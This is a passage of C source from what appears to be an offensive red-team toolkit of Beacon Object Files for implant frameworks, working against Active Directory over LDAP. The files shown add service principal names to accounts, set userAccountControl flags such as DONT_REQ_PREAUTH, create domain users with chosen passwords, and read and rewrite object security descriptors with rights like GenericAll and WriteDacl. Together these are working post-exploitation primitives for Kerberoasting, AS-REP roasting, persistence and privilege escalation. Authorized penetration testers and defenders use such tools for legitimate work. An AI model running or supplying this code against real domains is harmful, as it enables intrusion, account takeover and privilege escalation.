    // Parse arguments: target_identifier, is_dn, spn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* spn = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!spn || MSVCRT$strlen(spn) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] SPN is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Add SPN
    char* spn_values[] = { spn, NULL };
    LDAPModA spn_mod;
    spn_mod.mod_op = LDAP_MOD_ADD;
    spn_mod.mod_type = "servicePrincipalName";
    spn_mod.mod_vals.modv_strvals = spn_values;

    LDAPModA* mods[] = { &spn_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully added SPN '%s'", spn);
    } else if (result == LDAP_ATTRIBUTE_OR_VALUE_EXISTS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] SPN '%s' already exists", spn);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add SPN");
        PrintLdapError("Add SPN", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-uac.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

DECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char* str, char** endptr, int base);

typedef struct {
    const char* name;
    DWORD value;
} UAC_FLAG_MAP;

static const UAC_FLAG_MAP uacFlags[] = {
    {"SCRIPT", UF_SCRIPT},
    {"ACCOUNTDISABLE", UF_ACCOUNTDISABLE},
    {"HOMEDIR_REQUIRED", UF_HOMEDIR_REQUIRED},
    {"LOCKOUT", UF_LOCKOUT},
    {"PASSWD_NOTREQD", UF_PASSWD_NOTREQD},
    {"PASSWD_CANT_CHANGE", UF_PASSWD_CANT_CHANGE},
    {"ENCRYPTED_TEXT_PWD_ALLOWED", UF_ENCRYPTED_TEXT_PWD_ALLOWED},
    {"TEMP_DUPLICATE_ACCOUNT", UF_TEMP_DUPLICATE_ACCOUNT},
    {"NORMAL_ACCOUNT", UF_NORMAL_ACCOUNT},
    {"INTERDOMAIN_TRUST_ACCOUNT", UF_INTERDOMAIN_TRUST_ACCOUNT},
    {"WORKSTATION_TRUST_ACCOUNT", UF_WORKSTATION_TRUST_ACCOUNT},
    {"SERVER_TRUST_ACCOUNT", UF_SERVER_TRUST_ACCOUNT},
    {"DONT_EXPIRE_PASSWD", UF_DONT_EXPIRE_PASSWD},
    {"MNS_LOGON_ACCOUNT", UF_MNS_LOGON_ACCOUNT},
    {"SMARTCARD_REQUIRED", UF_SMARTCARD_REQUIRED},
    {"TRUSTED_FOR_DELEGATION", UF_TRUSTED_FOR_DELEGATION},
    {"NOT_DELEGATED", UF_NOT_DELEGATED},
    {"USE_DES_KEY_ONLY", UF_USE_DES_KEY_ONLY},
    {"DONT_REQ_PREAUTH", UF_DONT_REQ_PREAUTH},
    {"PASSWORD_EXPIRED", UF_PASSWORD_EXPIRED},
    {"TRUSTED_TO_AUTH_FOR_DELEGATION", UF_TRUSTED_TO_AUTH_FOR_DELEGATION},
    {"NO_AUTH_DATA_REQUIRED", UF_NO_AUTH_DATA_REQUIRED},
    {"PARTIAL_SECRETS_ACCOUNT", UF_PARTIAL_SECRETS_ACCOUNT},
    {NULL, 0}
};

DWORD ParseUACFlags(const char* flagString) {
    if (!flagString || MSVCRT$strlen(flagString) == 0) return 0;
    DWORD result = 0;
    char buffer[512];
    MSVCRT$_snprintf(buffer, sizeof(buffer), "%s", flagString);

    char* token = buffer;
    char* next = buffer;

    while (*next) {
        while (*next && *next != ',') next++;
        char savedChar = *next;
        *next = '\0';

        while (*token == ' ' || *token == '\t') token++;
        char* end = token + MSVCRT$strlen(token) - 1;
        while (end > token && (*end == ' ' || *end == '\t')) {
            *end = '\0';
            end--;
        }

        if (MSVCRT$strlen(token) > 0) {
            for (int i = 0; uacFlags[i].name != NULL; i++) {
                if (MSVCRT$strcmp(token, uacFlags[i].name) == 0) {
                    result |= uacFlags[i].value;
                    break;
                }
            }
        }

        if (savedChar) {
            *next = savedChar;
            next++;
            token = next;
        } else {
            break;
        }
    }
    return result;
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, flags, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* flagsValue = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!flagsValue || MSVCRT$strlen(flagsValue) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Flags are required (e.g., DONT_REQ_PREAUTH,DONT_EXPIRE_PASSWD)");
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Flags to add: %s", flagsValue);

    DWORD flagsToAdd = ParseUACFlags(flagsValue);
    if (flagsToAdd == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No valid flags parsed");
        return;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Parsed flags: 0x%08X", flagsToAdd);

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Get current UAC value
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "userAccountControl", NULL };
    ULONG result = WLDAP32$ldap_search_s(ld, targetDN, LDAP_SCOPE_BASE, "(objectClass=*)", attrs, 0, &searchResult);

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read current UAC");
        MSVCRT$free(targetDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    DWORD currentUAC = 0;
    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        char** values = WLDAP32$ldap_get_values(ld, entry, "userAccountControl");
        if (values && values[0]) {
            currentUAC = (DWORD)MSVCRT$strtol(values[0], NULL, 10);
            WLDAP32$ldap_value_free(values);
        }
    }
    WLDAP32$ldap_msgfree(searchResult);

    // Calculate new UAC value
    DWORD newUAC = currentUAC | flagsToAdd;
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Current UAC: 0x%08X -> New UAC: 0x%08X", currentUAC, newUAC);

    // Set new UAC value
    char uacString[32];
    MSVCRT$_snprintf(uacString, sizeof(uacString), "%lu", newUAC);

    char* uac_values[] = { uacString, NULL };
    LDAPModA uac_mod;
    uac_mod.mod_op = LDAP_MOD_REPLACE;
    uac_mod.mod_type = "userAccountControl";
    uac_mod.mod_vals.modv_strvals = uac_values;

    LDAPModA* mods[] = { &uac_mod, NULL };

    result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully added UAC flags");
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to modify UAC");
        PrintLdapError("Modify UAC", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-user.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: username (or DN), password, firstname, lastname, email, disabled, 
    // ou_path, dc_address, use_ldaps
    char* userIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isUserDN = BeaconDataInt(&parser);
    char* password = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* firstname = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* lastname = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* email = ValidateInput(BeaconDataExtract(&parser, NULL));
    int disabled = BeaconDataInt(&parser);
    char* ouPath = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!userIdentifier || MSVCRT$strlen(userIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Username or DN is required");
        return;
    }
    
    if (!password || MSVCRT$strlen(password) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Password is required");
        return;
    }
    
    // Force LDAPS if password provided
    BOOL requireLdaps = (password && MSVCRT$strlen(password) > 0) || useLdaps;
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context - will build from hostname if possible
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }
    
    // Build user DN and extract username
    char userDN[512];
    char username[256];
    
    if (isUserDN) {
        // Use provided DN directly
        MSVCRT$_snprintf(userDN, sizeof(userDN), "%s", userIdentifier);
        
        // Extract CN from DN for sAMAccountName
        char* cnStart = MSVCRT$strstr(userIdentifier, "CN=");
        if (cnStart) {
            cnStart += 3; // Skip "CN="
            char* cnEnd = MSVCRT$strstr(cnStart, ",");
            if (cnEnd) {
                int cnLen = cnEnd - cnStart;
                if (cnLen > 0 && cnLen < 256) {
                    MSVCRT$memcpy(username, cnStart, cnLen);
                    username[cnLen] = '\0';
                } else {
                    MSVCRT$strcpy(username, cnStart);
                }
            } else {
                MSVCRT$strcpy(username, cnStart);
            }
        } else {
            // Fallback: use the entire identifier as username
            MSVCRT$strcpy(username, userIdentifier);
        }
    } else {
        // Build DN using provided OU path or default Users container
        MSVCRT$strcpy(username, userIdentifier);
        
        if (ouPath && MSVCRT$strlen(ouPath) > 0) {
            // Use provided OU path
            MSVCRT$_snprintf(userDN, sizeof(userDN), "CN=%s,%s", username, ouPath);
        } else {
            // Use default Users container
            MSVCRT$_snprintf(userDN, sizeof(userDN), "CN=%s,CN=Users,%s", username, defaultNC);
        }
    }
    
    // Build UPN (username@domain)
    char upn[256];
    char* dcPtr = defaultNC;
    char domain[256] = {0};
    int domainPos = 0;
    int firstDC = 1;
    
    while (*dcPtr && domainPos < 255) {
        if (dcPtr[0] == 'D' && dcPtr[1] == 'C' && dcPtr[2] == '=') {
            dcPtr += 3;
            if (!firstDC) domain[domainPos++] = '.';
            firstDC = 0;
            while (*dcPtr && *dcPtr != ',' && domainPos < 255) {
                char ch = *dcPtr;
                if (ch >= 'A' && ch <= 'Z') ch += 32; // lowercase
                domain[domainPos++] = ch;
                dcPtr++;
            }
        } else {
            dcPtr++;
        }
    }
    domain[domainPos] = '\0';
    MSVCRT$_snprintf(upn, sizeof(upn), "%s@%s", username, domain);
    
    // Prepare attributes
    char* objectClass_values[] = { "top", "person", "organizationalPerson", "user", NULL };
    LDAPModA objectClass_mod = { LDAP_MOD_ADD, "objectClass", { .modv_strvals = objectClass_values } };
    
    char* cn_values[] = { username, NULL };
    LDAPModA cn_mod = { LDAP_MOD_ADD, "cn", { .modv_strvals = cn_values } };
    
    char* sam_values[] = { username, NULL };
    LDAPModA sam_mod = { LDAP_MOD_ADD, "sAMAccountName", { .modv_strvals = sam_values } };
    
    char* upn_values[] = { upn, NULL };
    LDAPModA upn_mod = { LDAP_MOD_ADD, "userPrincipalName", { .modv_strvals = upn_values } };
    
    char* uac_values[] = { disabled ? "514" : "512", NULL };
    LDAPModA uac_mod = { LDAP_MOD_ADD, "userAccountControl", { .modv_strvals = uac_values } };
    
    // Optional attributes
    LDAPModA givenName_mod, sn_mod, mail_mod, password_mod;
    BERVAL* encodedPassword = NULL;
    BERVAL* password_bervals[2] = { NULL, NULL };
    
    LDAPModA* attrs[10];
    int attrCount = 0;
    attrs[attrCount++] = &objectClass_mod;
    attrs[attrCount++] = &cn_mod;
    attrs[attrCount++] = &sam_mod;
    attrs[attrCount++] = &upn_mod;
    attrs[attrCount++] = &uac_mod;
    
    if (firstname && MSVCRT$strlen(firstname) > 0) {
        char* given_values[] = { firstname, NULL };
        givenName_mod.mod_op = LDAP_MOD_ADD;
        givenName_mod.mod_type = "givenName";
        givenName_mod.mod_vals.modv_strvals = given_values;
        attrs[attrCount++] = &givenName_mod;
    }
    
    if (lastname && MSVCRT$strlen(lastname) > 0) {
        char* sn_values[] = { lastname, NULL };
        sn_mod.mod_op = LDAP_MOD_ADD;
        sn_mod.mod_type = "sn";
        sn_mod.mod_vals.modv_strvals = sn_values;
        attrs[attrCount++] = &sn_mod;
    }
    
    if (email && MSVCRT$strlen(email) > 0) {
        char* mail_values[] = { email, NULL };
        mail_mod.mod_op = LDAP_MOD_ADD;
        mail_mod.mod_type = "mail";
        mail_mod.mod_vals.modv_strvals = mail_values;
        attrs[attrCount++] = &mail_mod;
    }
    
    if (password && MSVCRT$strlen(password) > 0) {
        encodedPassword = EncodePassword(password);
        if (encodedPassword) {
            password_bervals[0] = encodedPassword;
            password_mod.mod_op = LDAP_MOD_ADD | LDAP_MOD_BVALUES;
            password_mod.mod_type = "unicodePwd";
            password_mod.mod_vals.modv_bvals = password_bervals;
            attrs[attrCount++] = &password_mod;
        }
    }
    
    attrs[attrCount] = NULL;
    
    // Add user
    ULONG result = WLDAP32$ldap_add_s(ld, userDN, attrs);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created user '%s'", username);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] DN: %s", userDN);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create user");
        PrintLdapError("Add user", result);
        if (result == LDAP_ALREADY_EXISTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] User already exists");
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions");
        }
    }
    
    // Cleanup
    if (encodedPassword) {
        MSVCRT$free(encodedPassword->bv_val);
        MSVCRT$free(encodedPassword);
    }
    MSVCRT$free(defaultNC);
    MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/common/acl_common.c
================================================
// acl_common.c - Shared ACL/Security Descriptor utilities for BOF operations
// This file should be #included in each BOF that uses these functions

#include <windows.h>
#include "acl_common.h"

// Import required MSVCRT functions (already imported in ldap_common.c but listed for clarity)
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* str1, const char* str2);
DECLSPEC_IMPORT int __cdecl MSVCRT$strncmp(const char* str1, const char* str2, size_t count);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char* dest, const char* src);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strncpy(char* dest, const char* src, size_t count);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcat(char* dest, const char* src);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strstr(const char* str, const char* substr);
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(char* buffer, size_t count, const char* format, ...);
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* ptr);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void* dest, const void* src, size_t count);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* dest, int c, size_t count);

// ============================================================================
// SECURITY DESCRIPTOR OPERATIONS
// ============================================================================

// Read ntSecurityDescriptor attribute from LDAP object
BERVAL* ReadSecurityDescriptor(LDAP* ld, const char* objectDN) {
    if (!ld || !objectDN) return NULL;

    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char* attrs[] = { "ntSecurityDescriptor", NULL };
    struct berval** values = NULL;
    BERVAL* sdBerval = NULL;

    // Create SD_FLAGS control to request OWNER, GROUP, and DACL
    DWORD sdFlags = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION;

    char sdFlagsBuffer[10];
    struct berval sdFlagsValue;
    LDAPControlA* sdFlagsControl = BuildSDFlagsControl(sdFlags, sdFlagsBuffer, &sdFlagsValue);

    LDAPControlA* serverControls[] = { sdFlagsControl, NULL };

    // Search for the object with ntSecurityDescriptor attribute using the SD_FLAGS control
    ULONG result = WLDAP32$ldap_search_ext_s(
        ld,
        (char*)objectDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        serverControls,
        NULL,           // ClientControls
        NULL,           // timeout
        0,              // SizeLimit
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for object");
        PrintLdapError("Search for ntSecurityDescriptor", result);
        return NULL;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object not found");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    // Get the binary ntSecurityDescriptor value
    values = WLDAP32$ldap_get_values_len(ld, entry, "ntSecurityDescriptor");
    if (!values || !values[0]) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve ntSecurityDescriptor attribute");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    // Allocate and copy the security descriptor
    sdBerval = (BERVAL*)MSVCRT$malloc(sizeof(BERVAL));
    if (sdBerval) {
        sdBerval->bv_len = values[0]->bv_len;
        sdBerval->bv_val = (char*)MSVCRT$malloc(sdBerval->bv_len);
        if (sdBerval->bv_val) {
            MSVCRT$memcpy(sdBerval->bv_val, values[0]->bv_val, sdBerval->bv_len);
        } else {
            MSVCRT$free(sdBerval);
            sdBerval = NULL;
        }
    }

    WLDAP32$ldap_value_free_len(values);
    WLDAP32$ldap_msgfree(searchResult);

    return sdBerval;
}

// Write ntSecurityDescriptor attribute back to LDAP object
BOOL WriteSecurityDescriptor(LDAP* ld, const char* objectDN, BERVAL* sdBerval) {
    if (!ld || !objectDN || !sdBerval) return FALSE;

    struct berval* values[] = { sdBerval, NULL };
    LDAPModA sdMod;
    sdMod.mod_op = LDAP_MOD_REPLACE | LDAP_MOD_BVALUES;
    sdMod.mod_type = "ntSecurityDescriptor";
    sdMod.mod_vals.modv_bvals = values;

    LDAPModA* mods[] = { &sdMod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, (char*)objectDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully updated ntSecurityDescriptor");
        return TRUE;
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to update ntSecurityDescriptor");
        PrintLdapError("Update ntSecurityDescriptor", result);
        return FALSE;
    }
}

// Parse security descriptor buffer into structured information
PSD_INFO ParseSecurityDescriptor(BYTE* sdBuffer, DWORD sdLength) {
    if (!sdBuffer || sdLength == 0) return NULL;

    PSECURITY_DESCRIPTOR pSD = (PSECURITY_DESCRIPTOR)sdBuffer;
    PSD_INFO sdInfo = (PSD_INFO)MSVCRT$malloc(sizeof(SD_INFO));
    if (!sdInfo) return NULL;

    MSVCRT$memset(sdInfo, 0, sizeof(SD_INFO));

    // Get control flags
    SECURITY_DESCRIPTOR_CONTROL control = 0;
    DWORD revision = 0;
    if (!ADVAPI32$GetSecurityDescriptorControl(pSD, &control, &revision)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get security descriptor control");
        MSVCRT$free(sdInfo);
        return NULL;
    }
    sdInfo->ControlFlags = control;

    // Get Owner SID
    PSID pOwner = NULL;
    BOOL ownerDefaulted = FALSE;
    if (ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &ownerDefaulted) && pOwner) {
        LPSTR ownerSidStr = NULL;
        if (ADVAPI32$ConvertSidToStringSidA(pOwner, &ownerSidStr)) {
            size_t len = MSVCRT$strlen(ownerSidStr) + 1;
            sdInfo->OwnerSid = (char*)MSVCRT$malloc(len);
            if (sdInfo->OwnerSid) {
                MSVCRT$strcpy(sdInfo->OwnerSid, ownerSidStr);
            }
            KERNEL32$LocalFree(ownerSidStr);
        }
    }

    // Get Group SID
    PSID pGroup = NULL;
    BOOL groupDefaulted = FALSE;
    if (ADVAPI32$GetSecurityDescriptorGroup(pSD, &pGroup, &groupDefaulted) && pGroup) {
        LPSTR groupSidStr = NULL;
        if (ADVAPI32$ConvertSidToStringSidA(pGroup, &groupSidStr)) {
            size_t len = MSVCRT$strlen(groupSidStr) + 1;
            sdInfo->GroupSid = (char*)MSVCRT$malloc(len);
            if (sdInfo->GroupSid) {
                MSVCRT$strcpy(sdInfo->GroupSid, groupSidStr);
            }
            KERNEL32$LocalFree(groupSidStr);
        }
    }

    // Get DACL
    PACL pDacl = NULL;
    BOOL daclPresent = FALSE;
    BOOL daclDefaulted = FALSE;
    if (ADVAPI32$GetSecurityDescriptorDacl(pSD, &daclPresent, &pDacl, &daclDefaulted)) {
        sdInfo->HasDacl = daclPresent;

        if (daclPresent && pDacl) {
            ACL_SIZE_INFORMATION aclSizeInfo;
            if (ADVAPI32$GetAclInformation(pDacl, &aclSizeInfo, sizeof(aclSizeInfo), AclSizeInformation)) {
                sdInfo->DaclAceCount = aclSizeInfo.AceCount;

                if (aclSizeInfo.AceCount > 0) {
                    sdInfo->DaclAces = (PARSED_ACE_INFO*)MSVCRT$malloc(sizeof(PARSED_ACE_INFO) * aclSizeInfo.AceCount);
                    if (sdInfo->DaclAces) {
                        MSVCRT$memset(sdInfo->DaclAces, 0, sizeof(PARSED_ACE_INFO) * aclSizeInfo.AceCount);

                        // Parse each ACE
                        for (DWORD i = 0; i < aclSizeInfo.AceCount; i++) {
                            PACE_HEADER pAce = NULL;
                            if (ADVAPI32$GetAce(pDacl, i, (LPVOID*)&pAce)) {
                                ParseAce(pAce, &sdInfo->DaclAces[i]);
                            }
                        }
                    }
                }
            }
        }
    }

    // Get SACL (System ACL - for auditing)
    PACL pSacl = NULL;
    BOOL saclPresent = FALSE;
    BOOL saclDefaulted = FALSE;
    if (ADVAPI32$GetSecurityDescriptorSacl(pSD, &saclPresent, &pSacl, &saclDefaulted)) {
        sdInfo->HasSacl = saclPresent;

        if (saclPresent && pSacl) {
            ACL_SIZE_INFORMATION aclSizeInfo;
            if (ADVAPI32$GetAclInformation(pSacl, &aclSizeInfo, sizeof(aclSizeInfo), AclSizeInformation)) {
                sdInfo->SaclAceCount = aclSizeInfo.AceCount;

                if (aclSizeInfo.AceCount > 0) {
                    sdInfo->SaclAces = (PARSED_ACE_INFO*)MSVCRT$malloc(sizeof(PARSED_ACE_INFO) * aclSizeInfo.AceCount);
                    if (sdInfo->SaclAces) {
                        MSVCRT$memset(sdInfo->SaclAces, 0, sizeof(PARSED_ACE_INFO) * aclSizeInfo.AceCount);

                        for (DWORD i = 0; i < aclSizeInfo.AceCount; i++) {
                            PACE_HEADER pAce = NULL;
                            if (ADVAPI32$GetAce(pSacl, i, (LPVOID*)&pAce)) {
                                ParseAce(pAce, &sdInfo->SaclAces[i]);
                            }
                        }
                    }
                }
            }
        }
    }

    return sdInfo;
}

// Free parsed security descriptor information
void FreeSecurityDescriptorInfo(PSD_INFO sdInfo) {
    if (!sdInfo) return;

    if (sdInfo->OwnerSid) MSVCRT$free(sdInfo->OwnerSid);
    if (sdInfo->OwnerName) MSVCRT$free(sdInfo->OwnerName);
    if (sdInfo->GroupSid) MSVCRT$free(sdInfo->GroupSid);
    if (sdInfo->GroupName) MSVCRT$free(sdInfo->GroupName);

    // Free DACL ACEs
    if (sdInfo->DaclAces) {
        for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
            if (sdInfo->DaclAces[i].TrusteeSid) MSVCRT$free(sdInfo->DaclAces[i].TrusteeSid);
            if (sdInfo->DaclAces[i].TrusteeName) MSVCRT$free(sdInfo->DaclAces[i].TrusteeName);
        }
        MSVCRT$free(sdInfo->DaclAces);
    }

    // Free SACL ACEs
    if (sdInfo->SaclAces) {
        for (DWORD i = 0; i < sdInfo->SaclAceCount; i++) {
            if (sdInfo->SaclAces[i].TrusteeSid) MSVCRT$free(sdInfo->SaclAces[i].TrusteeSid);
            if (sdInfo->SaclAces[i].TrusteeName) MSVCRT$free(sdInfo->SaclAces[i].TrusteeName);
        }
        MSVCRT$free(sdInfo->SaclAces);
    }

    MSVCRT$free(sdInfo);
}

// ============================================================================
// ACE PARSING AND MANIPULATION
// ============================================================================

// Parse access mask string into ACCESS_MASK value
// Supports named masks (GenericAll, WriteDacl, etc.) and hex values (0x000F01FF)
ACCESS_MASK ParseAccessMask(const char* maskStr) {
    if (!maskStr || MSVCRT$strlen(maskStr) == 0) return 0;

    // Check for hex format (0x prefix)
    if (MSVCRT$strncmp(maskStr, "0x", 2) == 0 || MSVCRT$strncmp(maskStr, "0X", 2) == 0) {
        // Parse hex string
        ACCESS_MASK mask = 0;
        const char* p = maskStr + 2;
        while (*p) {
            mask <<= 4;
            if (*p >= '0' && *p <= '9') {
                mask |= (*p - '0');
            } else if (*p >= 'a' && *p <= 'f') {
                mask |= (*p - 'a' + 10);
            } else if (*p >= 'A' && *p <= 'F') {
                mask |= (*p - 'A' + 10);
            }
            p++;
        }
        return mask;
    }

    // Parse named masks (can be comma-separated)
    ACCESS_MASK mask = 0;
    char buffer[512];
    MSVCRT$strncpy(buffer, maskStr, sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';

    // Convert to lowercase for case-insensitive comparison
    char* p = buffer;
    while (*p) {
        if (*p >= 'A' && *p <= 'Z') {
            *p = *p + ('a' - 'A');
        }
        p++;
    }

    // Check for each known mask name (case-insensitive substrings)
    if (MSVCRT$strstr(buffer, "genericall")) {
        mask |= GENERIC_ALL;
    }
    if (MSVCRT$strstr(buffer, "genericwrite")) {
        mask |= GENERIC_WRITE;
    }
    if (MSVCRT$strstr(buffer, "genericread")) {
        mask |= GENERIC_READ;
    }
    if (MSVCRT$strstr(buffer, "genericexecute")) {
        mask |= GENERIC_EXECUTE;
    }
    if (MSVCRT$strstr(buffer, "writedacl")) {
        mask |= WRITE_DACL;
    }
    if (MSVCRT$strstr(buffer, "writeowner")) {
        mask |= WRITE_OWNER;
    }
    if (MSVCRT$strstr(buffer, "delete")) {
        mask |= DELETE_ACCESS;
    }
